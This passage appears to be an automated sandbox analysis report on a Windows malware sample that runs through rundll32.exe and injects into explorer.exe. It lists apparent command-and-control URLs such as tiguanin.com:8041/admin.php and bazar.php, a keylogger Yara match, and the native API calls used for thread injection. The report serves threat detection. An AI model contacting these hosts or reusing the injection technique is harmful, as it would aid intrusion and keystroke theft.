Source: explorer.exe, 0000001E.00000002.2586948409.00000000088BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000C16F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2595686792.000000000C1EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.000000000862F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/test/
Source: explorer.exe, 0000001E.00000002.2586948409.00000000088BA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/test/&
Source: explorer.exe, 0000001E.00000002.2595686792.000000000C1EB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/test/H
Source: explorer.exe, 0000001E.00000002.2586948409.00000000088BA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/test/T
Source: explorer.exe, 0000001E.00000002.2595686792.000000000C1EB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/test/a
Source: explorer.exe, 0000001E.00000002.2591885032.000000000C16F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/test/ons
Source: explorer.exe, 0000001E.00000002.2586707212.000000000841D000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://opewolumeras.com/test/
Source: explorer.exe, 0000001E.00000003.2291414903.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BE00000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://parade.com/61481/toriavey/where-did-hamburgers-originate
Source: explorer.exe, 0000001E.00000003.2291414903.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BE00000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.com
Source: rundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com/
Source: rundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com/zi
Source: rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2579247848.0000029F3B82B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2580699363.0000029F3BE24000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/
Source: rundll32.exe, 00000017.00000002.2580699363.0000029F3BE24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/0
Source: rundll32.exe, 00000017.00000002.2580699363.0000029F3BE24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/;
Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/E
Source: rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/N
Source: rundll32.exe, 00000017.00000002.2579815848.0000029F3B872000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2579247848.0000029F3B82B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2579301709.0000029F3B833000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2580699363.0000029F3BE19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.1848874183.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2580699363.0000029F3BE0F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/admin.php
Source: rundll32.exe, 00000017.00000002.2580699363.0000029F3BE19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/admin.phpA
Source: rundll32.exe, 00000017.00000002.2579815848.0000029F3B872000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/admin.phpN
Source: rundll32.exe, 00000017.00000002.2579815848.0000029F3B872000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/admin.phpW
Source: rundll32.exe, 00000017.00000002.2579247848.0000029F3B82B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/admin.phpte
Source: rundll32.exe, 00000017.00000002.2575784572.0000029F39CD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/bazar.php
Source: rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/bazar.phpk
Source: rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/bazar.phpn
Source: rundll32.exe, 00000017.00000002.2579247848.0000029F3B82B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/in.com:8041/
Source: rundll32.exe, 00000017.00000003.2178587162.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/in.com:8041/bazar.php
Source: rundll32.exe, 00000017.00000003.2029284131.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/net.com:8041/
Source: rundll32.exe, 00000017.00000003.2102376308.0000029F3B825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/p
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000001E.00000000.1578935505.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.2292493778.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.000000000899E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/bat
Source: explorer.exe, 0000001E.00000003.2291414903.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1583449825.000000000BE00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2591885032.000000000BE00000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-o
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/companies/kaiser-permanente-and-unions-for-75-000-striking-health-wo
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-whines-to-cameras-in-ny-fraud-case-before-fleeing-to-f
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/england-considers-raising-smoking-age-until-cigarettes-are-bann
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/nobel-prize-in-literature-to-be-announced-in-stockholm/ar-AA1hI
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-expresses-worry-about-congressional
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.stacker.com/arizona/phoenix
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de
Source: explorer.exe, 0000001E.00000000.1577355235.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584516696.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.yelp.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49773 version: TLS 1.2

Creates a DirectInput object (often for capturing keystrokes)

Source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: DirectInput8Create

memstr_81e4c7c7-f

Installs a raw input device (often for capturing keystrokes)

Source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_afbc3cd5-b

Yara detected Keylogger Generic

Source: Yara match	File source: 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7656, type: MEMORYSTR

Contains functionality to call native functions

Source: C:\Windows\System32\rundll32.exe	Code function: 23_3_0000029F3B7DD9FE NtOpenFile,	23_3_0000029F3B7DD9FE
Source: C:\Windows\System32\rundll32.exe	Code function: 23_3_0000029F3B7DDACE NtReadFile,	23_3_0000029F3B7DDACE
Source: C:\Windows\System32\rundll32.exe	Code function: 23_3_0000029F3B7DD98E NtAllocateVirtualMemory,	23_3_0000029F3B7DD98E
Source: C:\Windows\System32\rundll32.exe	Code function: 23_3_0000029F3B7DDA6E NtProtectVirtualMemory,	23_3_0000029F3B7DDA6E
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8F7A50 NtSetContextThread,	23_2_0000029F3B8F7A50
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8F55C0 NtClose,NtTerminateThread,	23_2_0000029F3B8F55C0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B9151C0 NtReadVirtualMemory,	23_2_0000029F3B9151C0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B9145F0 NtDuplicateObject,	23_2_0000029F3B9145F0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8E1600 NtClose,RtlExitUserThread,	23_2_0000029F3B8E1600
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8F8149 NtSetContextThread,	23_2_0000029F3B8F8149
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8E71B0 NtClose,	23_2_0000029F3B8E71B0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8F8C60 NtClose,CreateFiber,DeleteFiber,	23_2_0000029F3B8F8C60
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B914FF0 NtQueueApcThread,	23_2_0000029F3B914FF0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B914BE0 NtProtectVirtualMemory,	23_2_0000029F3B914BE0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B913F40 NtAllocateVirtualMemory,	23_2_0000029F3B913F40
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B914740 NtFreeVirtualMemory,	23_2_0000029F3B914740
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B914360 NtCreateThreadEx,	23_2_0000029F3B914360
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8FF3A0 CreateToolhelp32Snapshot,Thread32First,NtSuspendThread,NtResumeThread,Thread32Next,NtClose,	23_2_0000029F3B8FF3A0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8E17B0 NtClose,	23_2_0000029F3B8E17B0
Source: C:\Windows\explorer.exe	Code function: 30_2_089D82B4 NtFreeVirtualMemory,	30_2_089D82B4
Source: C:\Windows\explorer.exe	Code function: 30_2_089DB388 NtAllocateVirtualMemory,	30_2_089DB388
Source: C:\Windows\explorer.exe	Code function: 30_2_089DC704 NtDelayExecution,	30_2_089DC704
Source: C:\Windows\explorer.exe	Code function: 30_2_089D80B8 RtlInitUnicodeString,NtCreateFile,	30_2_089D80B8
Source: C:\Windows\explorer.exe	Code function: 30_2_089D8240 NtClose,	30_2_089D8240
Source: C:\Windows\explorer.exe	Code function: 30_2_089E01A0 NtFreeVirtualMemory,	30_2_089E01A0
Source: C:\Windows\explorer.exe	Code function: 30_2_089D81C8 NtWriteFile,	30_2_089D81C8
Source: C:\Windows\explorer.exe	Code function: 30_2_089E0130 NtAllocateVirtualMemory,	30_2_089E0130

Detected potential crypto function

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180041FEC	3_2_0000000180041FEC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001CFF8	3_2_000000018001CFF8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018003203C	3_2_000000018003203C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180020044	3_2_0000000180020044
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018004C060	3_2_000000018004C060
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001E080	3_2_000000018001E080
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180033088	3_2_0000000180033088
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001F0D0	3_2_000000018001F0D0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001D104	3_2_000000018001D104
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002C168	3_2_000000018002C168
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180021188	3_2_0000000180021188
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180024198	3_2_0000000180024198
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800221A0	3_2_00000001800221A0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800251B0	3_2_00000001800251B0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800231B8	3_2_00000001800231B8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001F1D8	3_2_000000018001F1D8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001E1D8	3_2_000000018001E1D8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001D260	3_2_000000018001D260
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001E2E0	3_2_000000018001E2E0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001F2E0	3_2_000000018001F2E0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018003430C	3_2_000000018003430C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001D364	3_2_000000018001D364
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180031388	3_2_0000000180031388
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002238C	3_2_000000018002238C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002539C	3_2_000000018002539C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800233A0	3_2_00000001800233A0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800123AC	3_2_00000001800123AC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800213B4	3_2_00000001800213B4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800243C4	3_2_00000001800243C4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001E3E8	3_2_000000018001E3E8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002E400	3_2_000000018002E400
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180032408	3_2_0000000180032408
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001F448	3_2_000000018001F448
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001D490	3_2_000000018001D490
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018004249C	3_2_000000018004249C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001E4F0	3_2_000000018001E4F0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002C4F8	3_2_000000018002C4F8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001C500	3_2_000000018001C500
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018004C510	3_2_000000018004C510
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001F550	3_2_000000018001F550
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002E554	3_2_000000018002E554
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018003356C	3_2_000000018003356C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002358C	3_2_000000018002358C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001D598	3_2_000000018001D598
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002159C	3_2_000000018002159C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800245AC	3_2_00000001800245AC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800225BC	3_2_00000001800225BC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800255CC	3_2_00000001800255CC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001C608	3_2_000000018001C608
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002B620	3_2_000000018002B620
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001F658	3_2_000000018001F658
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001E65C	3_2_000000018001E65C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001D6A0	3_2_000000018001D6A0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002E6D0	3_2_000000018002E6D0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001C710	3_2_000000018001C710
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001F760	3_2_000000018001F760
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180021784	3_2_0000000180021784
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180024794	3_2_0000000180024794
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001E7A0	3_2_000000018001E7A0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800227A8	3_2_00000001800227A8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001D7A8	3_2_000000018001D7A8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800317BC	3_2_00000001800317BC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800237BC	3_2_00000001800237BC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800327EC	3_2_00000001800327EC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001C81C	3_2_000000018001C81C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018004A838	3_2_000000018004A838
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001F8B8	3_2_000000018001F8B8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001E8E4	3_2_000000018001E8E4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001D900	3_2_000000018001D900
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002C904	3_2_000000018002C904
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001C978	3_2_000000018001C978
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180022990	3_2_0000000180022990
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800239A8	3_2_00000001800239A8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800219B0	3_2_00000001800219B0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002B9B4	3_2_000000018002B9B4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800249C0	3_2_00000001800249C0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001F9C0	3_2_000000018001F9C0
